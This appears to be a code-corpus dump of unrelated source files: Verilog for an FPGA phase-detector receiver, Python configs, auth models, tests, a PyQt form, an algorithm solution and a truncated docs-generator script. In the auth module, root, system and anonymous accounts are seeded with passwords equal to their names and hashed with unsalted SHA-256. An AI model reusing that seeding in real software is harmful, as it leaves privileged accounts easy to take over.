always @ (posedge $g_clock or posedge $reset) // Per-bit phase detection state machine
begin
if ($reset == 1'b1) begin
pdcounter <= 5'b1000 ;
ce_data_inta <= 1'b0 ;
flag <= 1'b0 ; // flag is there to only allow one inc or dec per cal (test)
end
else begin
busy_data_d <= busy_data_or[1] ;
    if ($use_phase_detector == 1'b1) begin        // decide whether the phase detector is used
incdec_data_d <= incdec_data_or[1] ;
valid_data_d <= valid_data_or[1] ;
if (ce_data_inta == 1'b1) begin
ce_data = mux ;
end
else begin
ce_data = 64'h0000000000000000 ;
end
if (state == 7) begin
flag <= 1'b0 ;
end
else if (state != 4 || busy_data_d == 1'b1) begin // Reset filter if state machine issues a cal command or unit is busy
pdcounter <= 5'b10000 ;
ce_data_inta <= 1'b0 ;
end
else if (pdcounter == 5'b11111 && flag == 1'b0) begin // Filter has reached positive max - increment the tap count
ce_data_inta <= 1'b1 ;
inc_data_int <= 1'b1 ;
pdcounter <= 5'b10000 ;
flag <= 1'b1 ;
end
else if (pdcounter == 5'b00000 && flag == 1'b0) begin // Filter has reached negative max - decrement the tap count
ce_data_inta <= 1'b1 ;
inc_data_int <= 1'b0 ;
pdcounter <= 5'b10000 ;
flag <= 1'b1 ;
end
else if (valid_data_d == 1'b1) begin // increment filter
ce_data_inta <= 1'b0 ;
if (incdec_data_d == 1'b1 && pdcounter != 5'b11111) begin
pdcounter <= pdcounter + 5'b00001 ;
end
else if (incdec_data_d == 1'b0 && pdcounter != 5'b00000) begin // decrement filter
pdcounter <= pdcounter + 5'b11111 ;
end
end
else begin
ce_data_inta <= 1'b0 ;
end
end
else begin
ce_data = all_ce ;
inc_data_int = debug_in[1] ;
end
end
end
assign inc_data = inc_data_int ;
assign incdec_data_or[0] = 1'b0 ; // Input Mux - Initialise generate loop OR gates
assign valid_data_or[0] = 1'b0 ;
assign busy_data_or[0] = 1'b0 ;
assign incdec_data_im = incdec_data & mux; // Input muxes
assign incdec_data_or[1] = incdec_data_im | incdec_data_or;     // AND gates to allow just one signal through at a time
assign valid_data_im = valid_data & mux; // followed by an OR
assign valid_data_or[1] = valid_data_im | valid_data_or; // for the three inputs from each PD
assign busy_data_or[1] = busy_data | busy_data_or; // The busy signals just need an OR gate
assign all_ce = debug_in[0] ;
IBUFDS #(
.DIFF_TERM ("$diff_term"))
data_in (
.I ($data_in_p),
.IB ($data_in_n),
.O (rx_data_in)
);
//
// Master IDELAY
//
IODELAY2 #(
.DATA_RATE ("SDR"),
.IDELAY_VALUE (0),
.IDELAY2_VALUE (0),
.IDELAY_MODE ("NORMAL" ),
.ODELAY_VALUE (0),
.IDELAY_TYPE ("DIFF_PHASE_DETECTOR"),
.COUNTER_WRAPAROUND ("STAY_AT_LIMIT"), //("WRAPAROUND"),
.DELAY_SRC ("IDATAIN"),
.SERDES_MODE ("MASTER"),
.SIM_TAPDELAY_VALUE ($sim_tap_delay)
) iodelay_m (
.IDATAIN (rx_data_in), // data from IBUFDS
.TOUT (), // tri-state signal to IOB
.DOUT (), // output data to IOB
.T (1'b1), // tri-state control from OLOGIC/OSERDES2
.ODATAIN (1'b0), // data from OLOGIC/OSERDES2
.DATAOUT (ddly_m), // Output data 1 to ILOGIC/ISERDES2
.DATAOUT2 (), // Output data 2 to ILOGIC/ISERDES2
.IOCLK0 ($rx_io_clock), // High speed clock for calibration
.IOCLK1 (1'b0), // High speed clock for calibration
.CLK ($g_clock), // Fabric clock (GCLK) for control signals
.CAL (cal_data_master), // Calibrate control signal
.INC (inc_data), // Increment counter
.CE (ce_data), // Clock Enable
.RST (rst_data), // Reset delay line
.BUSY () // output signal indicating sync circuit has finished / calibration has finished
);
//
// Slave IDELAY
//
IODELAY2 #(
.DATA_RATE ("SDR"),
.IDELAY_VALUE (0),
.IDELAY2_VALUE (0),
.IDELAY_MODE ("NORMAL" ),
.ODELAY_VALUE (0),
.IDELAY_TYPE ("DIFF_PHASE_DETECTOR"),
.COUNTER_WRAPAROUND ("WRAPAROUND"),
.DELAY_SRC ("IDATAIN"),
.SERDES_MODE ("SLAVE"),
.SIM_TAPDELAY_VALUE ($sim_tap_delay)
) iodelay_s (
.IDATAIN (rx_data_in), // data from IBUFDS
.TOUT (), // tri-state signal to IOB
.DOUT (), // output data to IOB
.T (1'b1), // tri-state control from OLOGIC/OSERDES2
.ODATAIN (1'b0), // data from OLOGIC/OSERDES2
.DATAOUT (ddly_s), // Slave output data to ILOGIC/ISERDES2
.DATAOUT2 (), //
.IOCLK0 ($rx_io_clock), // High speed IO clock for calibration
.IOCLK1 (1'b0),
.CLK ($g_clock), // Fabric clock (GCLK) for control signals
.CAL (cal_data_slave), // Calibrate control signal
.INC (inc_data), // Increment counter
.CE (ce_data), // Clock Enable
.RST (rst_data), // Reset delay line
.BUSY (busys) // output signal indicating sync circuit has finished / calibration has finished
);
//
// Master ISERDES
//
ISERDES2 #(
.DATA_WIDTH (5),
.DATA_RATE ("SDR"),
.BITSLIP_ENABLE ("$bit_slip_enable"),
.SERDES_MODE ("MASTER"),
.INTERFACE_TYPE ("RETIMED"))
iserdes_m (
.D (ddly_m),
.CE0 (1'b1),
.CLK0 ($rx_io_clock),
.CLK1 (1'b0),
.IOCE ($rx_serdes_strobe),
.RST ($reset),
.CLKDIV ($g_clock),
.SHIFTIN (pd_edge),
.BITSLIP ($bit_slip),
.FABRICOUT (),
.Q4 ($data_out[4]),
.Q3 ($data_out[3]),
.Q2 ($data_out[2]),
.Q1 ($data_out[1]),
.DFB (),
.CFB0 (),
.CFB1 (),
.VALID (valid_data),
.INCDEC (incdec_data),
.SHIFTOUT (cascade));
//
// Slave ISERDES
//
ISERDES2 #(
.DATA_WIDTH (5),
.DATA_RATE ("SDR"),
.BITSLIP_ENABLE ("$bit_slip_enable"),
.SERDES_MODE ("SLAVE"),
.INTERFACE_TYPE ("RETIMED")
) iserdes_s (
.D (ddly_s),
.CE0 (1'b1),
.CLK0 ($rx_io_clock),
.CLK1 (1'b0),
.IOCE ($rx_serdes_strobe),
.RST ($reset),
.CLKDIV ($g_clock),
.SHIFTIN (cascade),
.BITSLIP ($bit_slip),
.FABRICOUT (),
.Q4 ($data_out[0]),
.Q3 (),
.Q2 (),
.Q1 (),
.DFB (),
.CFB0 (),
.CFB1 (),
.VALID (),
.INCDEC (),
.SHIFTOUT (pd_edge));
always @ (posedge $g_clock or posedge $reset) begin
if ($reset)
rxpdcntr <= 8'h7f;
else if (ce_data)
if (inc_data)
rxpdcntr <= rxpdcntr + 1'b1;
else
rxpdcntr <= rxpdcntr - 1'b1;
end
"""
|
import os
NRESULTS_ALLOWED_SCHEMAS = ['nr_nresults/nr-nresults-v1.0.0.json']
NRESULTS_PREFERRED_SCHEMA = 'nr_nresults/nr-nresults-v1.0.0.json'
DRAFT_NRESULT_PID_TYPE = 'dnrnrs'
DRAFT_NRESULT_RECORD = 'nr_nresults.record:DraftNResultRecord'
PUBLISHED_NRESULT_PID_TYPE = 'nrnrs'
PUBLISHED_NRESULT_RECORD = 'nr_nresults.record:PublishedNResultRecord'
ALL_NRESULTS_PID_TYPE = 'anrnrs'
ALL_NRESULTS_RECORD_CLASS = 'nr_nresults.record:AllNResultRecord'
published_index_name = 'nr_nresults-nr-nresults-v1.0.0'
draft_index_name = 'draft-nr_nresults-nr-nresults-v1.0.0'
all_nresults_index_name = 'nr-all-nresults'
prefixed_published_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX',
'') + published_index_name
prefixed_draft_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX', '') + draft_index_name
prefixed_all_nresults_index_name = os.environ.get('INVENIO_SEARCH_INDEX_PREFIX', '') + all_nresults_index_name
|
# -*- coding: utf-8 -*-
# Copyright 2015 www.suishouguan.com
#
# Licensed under the Private License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/samuelbaizg/ssguan/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ssguan.ignitor import IGNITOR_DOMAIN
from ssguan.ignitor.auth import logger
from ssguan.ignitor.base import context
from ssguan.ignitor.orm import properti
from ssguan.ignitor.orm.error import UniqueError
from ssguan.ignitor.orm.model import Model
from ssguan.ignitor.orm.validator import UniqueValidator, IllegalValidator, \
LengthValidator
from ssguan.ignitor.utility import crypt, kind
from ssguan.ignitor.base.struct import JsonMixin
def encrypt_password(password):
return password if kind.str_is_empty(password) else crypt.str_to_sha256_hex(password)
class User(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
ID_ANONYMOUS = "anonymous"
ID_ROOT = "root"
ID_SYSTEM = "system"
ACCOUNT_NAME_ANONYMOUS = "anonymous"
ACCOUNT_NAME_ROOT = "root"
ACCOUNT_NAME_SYSTEM = "system"
u_account = properti.StringProperty(required=True, validator=[LengthValidator(minlength=3, maxlength=20), UniqueValidator("u_account"), IllegalValidator()])
u_password = properti.StringProperty(required=True, validator=IllegalValidator())
u_attributes = properti.DictProperty(required=False)
u_preferences = properti.DictProperty(required=False)
disable_flag = properti.BooleanProperty(default=False)
def is_anonymous(self):
return self.ID_ANONYMOUS == self.key()
def is_superadmin(self):
return self.ID_ROOT == self.key()
@classmethod
def create_schema(cls, dbconn=None):
schema = super(User, cls).create_schema(dbconn=dbconn)
try:
user1 = User(u_account=cls.ACCOUNT_NAME_ANONYMOUS,
u_password=encrypt_password(cls.ACCOUNT_NAME_ANONYMOUS))
user1.create(None, key=cls.ID_ANONYMOUS)
user1 = User(u_account=cls.ACCOUNT_NAME_ROOT,
u_password=encrypt_password(cls.ACCOUNT_NAME_ROOT))
user1.create(None, key=cls.ID_ROOT)
user1 = User(u_account=cls.ACCOUNT_NAME_SYSTEM,
u_password=encrypt_password(cls.ACCOUNT_NAME_SYSTEM))
user1.create(None, key=cls.ID_SYSTEM)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "u_account"
return schema
class Role(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
ID_ANONYMOUS = "role_anonymous_0"
ANONYMOUS_ROLE_CODE = "anonymous"
ANONYMOUS_ROLE_NAME = "anonymous"
role_code = properti.StringProperty(required=True, validator=[UniqueValidator("role_code")])
role_name = properti.StringProperty(required=True, validator=[UniqueValidator("role_name")])
reserve_flag = properti.BooleanProperty(default=False)
enable_flag = properti.BooleanProperty(default=True)
def fetch_roleoperations(self):
"""
        :return: the operation codes assigned to this role
        :rtype: list
"""
query = RoleOperation.all()
query.filter("role_id =", self.key())
roleopeations = query.fetch()
codes = []
for ro in roleopeations:
codes.append(ro.operation_code)
return codes
def delete_roleoperations(self, operation_code=None):
query = RoleOperation.all()
query.filter("role_id =", self.key())
if operation_code is not None:
query.filter("operation_code =", operation_code)
return query.delete(context.get_user_id())
def create_roleoperation(self, operation_code):
roleoperation = RoleOperation(role_id=self.key(
), operation_code=operation_code)
roleoperation.create(context.get_user_id())
return roleoperation
@classmethod
def create_schema(cls, dbconn=None):
schema = super(Role, cls).create_schema(dbconn=dbconn)
try:
role = Role(role_code=cls.ANONYMOUS_ROLE_CODE, role_name=cls.ANONYMOUS_ROLE_NAME, reserve_flag=True)
role.create(None, key=cls.ID_ANONYMOUS)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "roleName"
return schema
class RoleOperation(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
role_id = properti.StringProperty(required=True)
operation_code = properti.StringProperty(length=200, required=True, validator=[
UniqueValidator("operation_code", scope=["role_id"])])
class UserRole(Model):
@classmethod
def meta_domain(cls):
return IGNITOR_DOMAIN
user_id = properti.StringProperty(required=True)
role_id = properti.StringProperty(required=True)
@classmethod
def create_schema(cls, dbconn=None):
schema = super(UserRole, cls).create_schema(dbconn=dbconn)
try:
userrole = UserRole(user_id=User.ID_ANONYMOUS, role_id=Role.ID_ANONYMOUS)
userrole.create(None)
except UniqueError as e:
logger.info(e.message)
assert e.get_argument("label") == "roleName"
return schema
class Token(JsonMixin):
def __init__(self, user_id, u_account, role_codes, operation_codes, anonymous=False):
self.__user_id = user_id
self.__account = u_account
self.__anonymous = anonymous
self.__role_codes = list(role_codes)
self.__operation_codes = list(operation_codes)
self.__rsa_key = crypt.rsa_gen_key_hex(256)
@property
def user_id(self):
return self.__user_id
@property
def account(self):
return self.__account
@property
def rsa_key(self):
return self.__rsa_key
@property
def role_codes(self):
return self.__role_codes
@property
def operation_codes(self):
return self.__operation_codes
def is_anonymous(self):
return self.__anonymous is True
def __setitem__(self, key, value):
self.__dict__[key] = value
def to_dict(self):
dic = {}
dic['lopuKey'] = {'e': self.__rsa_key['e'], 'n': self.__rsa_key['n']}
dic['anonymous'] = self.__anonymous
dic['account'] = self.__account
dic['operation_codes'] = self.__operation_codes
for key, value in self.__dict__.items():
if not key.startswith("__"):
dic[key] = value
return dic
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-10-17 13:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20181015_0847'),
]
operations = [
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateTimeField(verbose_name='date published')),
('user_name', models.CharField(max_length=100)),
('comment', models.CharField(max_length=200)),
('rating', models.IntegerField(choices=[(1, '1'), (2, '2'), (3, '3'), (4, '4'), (5, '5')])),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.Project')),
],
),
migrations.AlterField(
model_name='profile',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL),
),
]
|
from sklearn.metrics import f1_score
import torch
import torch.nn as nn
from torch.nn import Module
import torch.nn.functional as F
import math
import torch.optim as optim
import numpy as np
import time
from utils import inverse_norm
# from plot_fig.histogram import plot_histogram
def accuracy(output, labels):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def f1(output, labels):
preds = output.max(1)[1]
preds = preds.cpu().detach().numpy()
labels = labels.cpu().detach().numpy()
micro = f1_score(labels, preds, average='micro')
macro = f1_score(labels, preds, average='macro')
return micro, macro
def MAPE_y_head(pre_volume, true_volume):
MAPE_SCORE = []
eps = 1e-5
for i in range(len(pre_volume)):
cur_mape = abs(pre_volume[i] - true_volume[i])/(pre_volume[i]+eps)
MAPE_SCORE.append(cur_mape.item())
return np.mean(MAPE_SCORE)
def MAPE_y(pre_volume, true_volume):
MAPE_SCORE = []
eps = 1e-5
for i in range(len(pre_volume)):
cur_mape = abs(pre_volume[i] - true_volume[i])/(true_volume[i]+eps)
MAPE_SCORE.append(cur_mape.item())
return np.mean(MAPE_SCORE)
def RMSE(pre_volume, true_volume):
RMSE_SCORE = []
for i in range(len(pre_volume)):
cur_rmse = (pre_volume[i] - true_volume[i])**2
RMSE_SCORE.append(cur_rmse.item())
return (np.sum(RMSE_SCORE)/len(pre_volume))**0.5
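# Worked check of the two metrics (illustrative numbers, ignoring eps): for
# predictions [10, 20] against true volumes [8, 25],
#   MAPE_y = mean(|10-8|/8, |20-25|/25) = mean(0.25, 0.20) = 0.225
#   RMSE   = sqrt(((10-8)^2 + (20-25)^2) / 2) = sqrt(14.5) ~= 3.81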
def show_info(epoch, leida, time_slice_volume, unnormed_ways_segment_volume_dict):
# if len(time_slice_volume) == 12:
# file_path = "hangzhou"
# else:
file_path = "jinan"
with open("{}\log\{}_epoch_{}_roadid_{}_log.txt".format(file_path,time.strftime('%Y_%m_%d_%H_%M_%S',time.localtime(time.time())),epoch,leida), "w", encoding='utf-8') as f:
# print("cur_raod id:{}".format(leida))
f.write("cur_raod id:{}\n".format(leida))
for i in range(len(time_slice_volume)):
# print("第{}个时间片上\t预测流量:{:.2f}\t真实流量:{}".format(i, time_slice_volume[i], unnormed_ways_segment_volume_dict[leida][i]))
f.write("第{}个时间片上\t预测流量:{:.2f}\t真实流量:{}\n".format(i, time_slice_volume[i], unnormed_ways_segment_volume_dict[leida][i]))
def calculate_index(epoch, pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict, volume_sqrt_var, volume_mean, topk):
for leida, time_slice_volume in pre_leida_time_slice_volume_dict.items():
for idx,volume in enumerate(time_slice_volume):
pre_leida_time_slice_volume_dict[leida][idx] = volume*volume_sqrt_var[idx] + volume_mean[idx]
leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head, leida_pre_RMSE_info = {}, {}, {}
for leida, time_slice_volume in pre_leida_time_slice_volume_dict.items(): # key=leida_id value=[] len =12
for idx,item in enumerate(time_slice_volume):
if item < 0:
time_slice_volume[idx] = -time_slice_volume[idx]
leida_pre_MAPE_info_y[leida] = MAPE_y(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
leida_pre_MAPE_info_y_head[leida] = MAPE_y_head(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
leida_pre_RMSE_info[leida] = RMSE(time_slice_volume, unnormed_ways_segment_volume_dict[leida])
show_info(epoch, leida, time_slice_volume, unnormed_ways_segment_volume_dict)
# plot_histogram(pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict)
return leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head, leida_pre_RMSE_info
def evaluate_metric(epoch, output_embedding, train_ways_segment_volume_dict, train_ways_segment_vec_dict, test_ways_segment_volume_dict, unnormed_ways_segment_volume_dict, topk, volume_sqrt_var, volume_mean):
true_volume = []
MAP_SCORE = []
test_ways_segment_vec_dict = {}
test_ways_segment_list = list(test_ways_segment_volume_dict.keys())
for i, item in enumerate(test_ways_segment_list):
test_ways_segment_vec_dict[item] = output_embedding[:, item]
pre_leida_time_slice_volume_dict = { }
for k1,v1 in test_ways_segment_vec_dict.items():
score_dict = {}
for k2, v2 in train_ways_segment_vec_dict.items():
if(k1 != k2):
curr_score = torch.cosine_similarity(v1, v2, dim=-1)
score_dict[k2] = curr_score # size=12
sorted_score_dict_max_list = []
for j in range(v1.shape[0]):
sorted_score_dict_max_list.append([item[0] for item in sorted(score_dict.items(), key=lambda item:item[1][j], reverse = True)[:topk]])
pre_volume = []
for time_slice, top_list in enumerate(sorted_score_dict_max_list):
sum_volume_max = .0
sum_sim_score = .0
for top_item in top_list:
sum_volume_max = sum_volume_max + train_ways_segment_volume_dict[top_item][time_slice]*score_dict[top_item][time_slice]
sum_sim_score = sum_sim_score + score_dict[top_item][time_slice]
cur_pre_volume = sum_volume_max/sum_sim_score
pre_volume.append(cur_pre_volume)
pre_leida_time_slice_volume_dict[k1] = pre_volume
leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head,leida_pre_RMSE_info = calculate_index(epoch, pre_leida_time_slice_volume_dict, unnormed_ways_segment_volume_dict, volume_sqrt_var, volume_mean, topk)
return leida_pre_MAPE_info_y, leida_pre_MAPE_info_y_head,leida_pre_RMSE_info
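# Descriptive note on evaluate_metric: each held-out road segment is compared
# against every training segment by per-time-slice cosine similarity of their
# embeddings; its volume in each slice is then predicted as the similarity-
# weighted average of the top-k most similar training segments' volumes, and
# calculate_index() de-normalizes with volume_sqrt_var / volume_mean before
# reporting per-segment MAPE and RMSE.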
|
from data_stack.io.resources import StreamedTextResource
import pandas as pd
import torch
from data_stack.dataset.iterator import DatasetIterator
class ArrhythmiaIterator(DatasetIterator):
def __init__(self, samples_stream: StreamedTextResource, targets_stream: StreamedTextResource):
self.samples = pd.read_csv(samples_stream)
self.targets = pd.read_csv(targets_stream)
samples_stream.close()
targets_stream.close()
def __len__(self):
return len(self.samples)
def __getitem__(self, index: int):
""" Returns the sample and target of the dataset at given index position.
:param index: index within dataset
:return: sample, target, tag
"""
sample_tensor = torch.FloatTensor(self.samples.iloc[index].to_numpy())
target = int(self.targets.iloc[index])
return sample_tensor, target, target
|
# Copyright 2021 Canonical Ltd.
# See LICENSE file for licensing details.
"""Module testing the Legend SDLC Operator."""
import json
from charms.finos_legend_libs.v0 import legend_operator_testing
from ops import testing as ops_testing
import charm
class LegendSdlcTestWrapper(charm.LegendSDLCServerCharm):
@classmethod
def _get_relations_test_data(cls):
return {
cls._get_legend_db_relation_name(): {
"legend-db-connection": json.dumps(
{
"username": "test_db_user",
"password": "test_db_pass",
"database": "test_db_name",
"uri": "test_db_uri",
}
)
},
cls._get_legend_gitlab_relation_name(): {
"legend-gitlab-connection": json.dumps(
{
"gitlab_host": "gitlab_test_host",
"gitlab_port": 7667,
"gitlab_scheme": "https",
"client_id": "test_client_id",
"client_secret": "test_client_secret",
"openid_discovery_url": "test_discovery_url",
"gitlab_host_cert_b64": "test_gitlab_cert",
}
)
},
}
def _get_service_configs_clone(self, relation_data):
return {}
class LegendSdlcTestCase(legend_operator_testing.TestBaseFinosCoreServiceLegendCharm):
@classmethod
def _set_up_harness(cls):
harness = ops_testing.Harness(LegendSdlcTestWrapper)
return harness
def test_get_core_legend_service_configs(self):
self._test_get_core_legend_service_configs()
def test_relations_waiting(self):
self._test_relations_waiting()
def test_studio_relation_joined(self):
self.harness.set_leader(True)
self.harness.begin_with_initial_hooks()
relator_name = "finos-legend-studio-k8s"
rel_id = self.harness.add_relation(charm.LEGEND_STUDIO_RELATION_NAME, relator_name)
relator_unit = "%s/0" % relator_name
self.harness.add_relation_unit(rel_id, relator_unit)
self.harness.update_relation_data(rel_id, relator_unit, {})
rel = self.harness.charm.framework.model.get_relation(
charm.LEGEND_STUDIO_RELATION_NAME, rel_id
)
self.assertEqual(
rel.data[self.harness.charm.app],
{"legend-sdlc-url": self.harness.charm._get_sdlc_service_url()},
)
|
# coding: utf-8
from __future__ import unicode_literals
from spacy.matcher import PhraseMatcher
from spacy.lang.en import English
from spacy.compat import pickle
def test_issue3248_1():
"""Test that the PhraseMatcher correctly reports its number of rules, not
total number of patterns."""
nlp = English()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("TEST1", None, nlp("a"), nlp("b"), nlp("c"))
matcher.add("TEST2", None, nlp("d"))
assert len(matcher) == 2
def test_issue3248_2():
"""Test that the PhraseMatcher can be pickled correctly."""
nlp = English()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("TEST1", None, nlp("a"), nlp("b"), nlp("c"))
matcher.add("TEST2", None, nlp("d"))
data = pickle.dumps(matcher)
new_matcher = pickle.loads(data)
assert len(new_matcher) == len(matcher)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the masterfile package: https://github.com/uwmadison-chm/masterfile
# Copyright (c) 2020 Board of Regents of the University of Wisconsin System
# Written by Nate Vack <njvack@wisc.edu> at the Center for Healthy Minds
# at the University of Wisconsin-Madison.
# Released under MIT licence; see LICENSE at the package root.
from masterfile.formatters import column_number_to_column_id
import pytest
class TestFormatters(object):
def test_column_number_to_column_id_normal_inputs(self):
assert column_number_to_column_id(1) == 'A'
assert column_number_to_column_id(26) == 'Z'
assert column_number_to_column_id(27) == 'AA'
assert column_number_to_column_id(28) == 'AB'
assert column_number_to_column_id(702) == 'ZZ'
assert column_number_to_column_id(703) == 'AAA'
assert column_number_to_column_id(704) == 'AAB'
def test_column_number_to_column_id_bad_inputs(self):
with pytest.raises(AttributeError):
column_number_to_column_id('A')
with pytest.raises(AttributeError):
column_number_to_column_id(1.1)
with pytest.raises(AttributeError):
column_number_to_column_id(-1)
with pytest.raises(AttributeError):
column_number_to_column_id(0)
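# Hedged reference sketch (not part of masterfile): the mapping exercised above
# is bijective base-26 ("Excel column" style), e.g. 1 -> 'A', 27 -> 'AA',
# 703 -> 'AAA'; input validation is omitted here.
def _column_id_sketch(n):
    letters = ''
    while n > 0:
        n, rem = divmod(n - 1, 26)
        letters = chr(ord('A') + rem) + letters
    return letters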
|
# Title: 우수 마을
# Link: https://www.acmicpc.net/problem/1949
import sys
from collections import defaultdict
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def get_max(vil: int, select: int, dp: list, edges: defaultdict, popls: list, p_node: int):
if dp[vil][select] != -1:
return dp[vil][select]
ans = popls[vil] if select else 0
for child in edges[vil]:
if child == p_node:
continue
if select:
ans += get_max(child, 0, dp, edges, popls, vil)
else:
ans += max(get_max(child, 0, dp, edges, popls, vil), get_max(child, 1, dp, edges, popls, vil))
dp[vil][select] = ans
return ans
def solution(n: int, popls: list, edges: defaultdict):
dp = [[-1 for _ in range(2)] for _ in range(n+1)]
return max(get_max(1, 0, dp, edges, popls, 0), get_max(1, 1, dp, edges, popls, 0))
def main():
n = read_single_int()
popls = [0] + read_list_int()
edges = defaultdict(lambda: [])
for _ in range(n-1):
a, b = read_list_int()
edges[a].append(b)
edges[b].append(a)
print(solution(n, popls, edges))
if __name__ == '__main__':
main()
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow
class Ui_createUserWidget(QMainWindow):
def __init__(self):
super(Ui_createUserWidget, self).__init__()
self.setupUi()
def setupUi(self):
self.setObjectName("createUserWidget")
self.setFixedSize(412, 187)
#background setup
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(135, 0, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(135, 0, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
self.setPalette(palette)
#icon setup
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.setWindowIcon(icon)
#text white color setup
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
#font setup
font = QtGui.QFont()
font.setFamily("Bahnschrift SemiBold SemiConden")
font.setPointSize(14)
self.label = QtWidgets.QLabel(self)
self.label.setGeometry(QtCore.QRect(160, 20, 101, 31))
self.label.setPalette(palette)
self.label.setFont(font)
self.label.setObjectName("label")
font.setPointSize(13)
self.newUserInput = QtWidgets.QLineEdit(self)
self.newUserInput.setGeometry(QtCore.QRect(30, 60, 351, 41))
self.newUserInput.setFont(font)
self.newUserInput.setAlignment(QtCore.Qt.AlignCenter)
self.newUserInput.setObjectName("newUserInput")
self.newUserInput.setToolTip("Enter a unique username")
self.createUserButton = QtWidgets.QPushButton(self)
self.createUserButton.setGeometry(QtCore.QRect(140, 120, 131, 41))
font.setPointSize(12)
self.createUserButton.setFont(font)
self.createUserButton.setObjectName("createUserButton")
self.retranslateUi(self)
QtCore.QMetaObject.connectSlotsByName(self)
def retranslateUi(self, createUserWidget):
_translate = QtCore.QCoreApplication.translate
createUserWidget.setWindowTitle(_translate("createUserWidget", "New User"))
self.label.setText(_translate("createUserWidget", "Username:"))
self.newUserInput.setPlaceholderText(_translate("createUserWidget", "Enter Username"))
self.createUserButton.setText(_translate("createUserWidget", "CREATE USER"))
|
#!/usr/bin/env python
from __future__ import print_function
__author__ = 'Whirliwig'
__license__ = 'MIT'
__version__ = '0.5'
__email__ = 'ant@dervishsoftware.com'
from os import path, chdir, listdir, walk, putenv
import shutil
import sys
import tomdoc_converter_objc
import subprocess
from tomdoc_converter_objc import OutputGenerator, InputTranslator
script_path = path.dirname(path.realpath(__file__))
# Add 'Python' in the same directory as this script to sys.path
sys.path.append(path.join(script_path, "Python"))
import argparse
import distutils
from tempfile import mkdtemp
from pprint import pprint as pp
verbosity = 0
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
doxygen_binary=which('doxygen')
appledoc_binary=which('appledoc')
def convert_tomdoc(input_dir, temp_dir, translator, generator):
src_dirs = [x[0] for x in walk(input_dir)]
tomdoc_converter_objc.generate(src_dirs, temp_dir, translator, generator, False)
def bool_str(truthy):
if truthy:
return 'YES'
else:
return 'NO'
def generate_docs(doxygen_templates_dir, args):
temp_dir = mkdtemp('','gendocs.')
print("doxygen = {}, appledoc = {}".format(doxygen_binary, appledoc_binary))
# Pre-requisites
if args.generator == 'appledoc':
if not appledoc_binary:
print("Cannot find appledoc binary.", file=sys.stderr)
exit(1)
generator = OutputGenerator.appledoc
elif args.generator == 'doxygen':
if not doxygen_binary:
print("Cannot find doxygen binary.", file=sys.stderr)
exit(1)
generator = OutputGenerator.doxygen
company_name = args.company
if not company_name: company_name = 'unknown'
company_id=args.company_id
if not company_id: company_id = '.'.join(['com', company_name])
docset_name = args.name
docset_id = '.'.join([company_id, args.name])
src_dir = args.srcdir
index_path = args.index
dot_path = args.dot_path
output_dir = args.output
if not output_dir:
output_dir = path.join(temp_dir,'doc')
doxygen_template = path.extsep.join([args.format, args.language, 'Doxyfile'])
source_browser_yn = bool_str(args.source)
print('Docset =',docset_id)
"""
Convert headers from Tomdoc, if required
"""
index_file=None
if args.tomdoc or args.translate:
if args.tomdoc:
header_translator = InputTranslator.tomdoc
else:
header_translator = InputTranslator.simple
print("Converting headers in", src_dir)
if (index_path):
shutil.copy(index_path, temp_dir)
